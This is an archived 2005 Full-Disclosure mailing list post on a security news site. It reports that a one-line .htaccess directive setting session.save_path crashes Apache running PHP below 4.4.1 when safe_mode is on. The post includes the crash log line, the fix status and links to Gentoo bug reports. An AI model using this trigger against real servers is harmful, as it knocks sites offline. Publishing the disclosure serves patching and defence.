Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security VulnWatch
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-disclosure] php < 4.4.1 htaccess apache dos

from [Eric Romang / ZATAZ.com] Network Security [Permanent Link]
Subject: [Full-disclosure] php < 4.4.1 htaccess apache dos
Date: Mon, 24 Oct 2005 09:36:38 +0200 
Hello,

Here under some stuff to dos apache + php just through an htaccess.

* With .htaccess method :

If you have into your php.ini -> safe_mode = On

Simply put a .htaccess file on the root directory of your website
with this content :

php_value session.save_path /var/www/somewherehowexist

Apache segfault with :

[Fri Sep 30 10:33:11 2005] [notice] child pid 17743 exit signal Trace/breakpoint trap (5)

There was a bug in the apache2handler SAPI, sapi_apache2.c file, that made this segfault here possible, the bug now is fixed upstream and 5.1.0 final, 4.4.1 final and the next 5.0.X release will have the patch.

Also work with session.save_path into a VirtualHost.


Gentoo bug report :

http://bugs.gentoo.org/show_bug.cgi?id=107602
and
http://bugs.gentoo.org/show_bug.cgi?id=98871

Regards.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Full-disclosure] php < 4.4.1 htaccess apache dos, Eric Romang / ZATAZ.com <=
Previous by Date:  [Full-disclosure] iDEFENSE Security Advisory 10.20.05: Symantec Norton AntiVirus DiskMountNotify Local Privilege Escalation, iDEFENSE Labs
Next by Date:  [Full-disclosure] iDEFENSE Security Advisory 10.24.05: SCO Openserver backupsh 'Home' Buffer Overflow Vulnerability, iDEFENSE Labs
Previous by Thread:  [Full-disclosure] iDEFENSE Security Advisory 10.20.05: Symantec Norton AntiVirus DiskMountNotify Local Privilege Escalation, iDEFENSE Labs
Next by Thread:  [Full-disclosure] iDEFENSE Security Advisory 10.24.05: SCO Openserver backupsh 'Home' Buffer Overflow Vulnerability, iDEFENSE Labs
Indexes:  [Date] [Thread] [Top] [All Lists]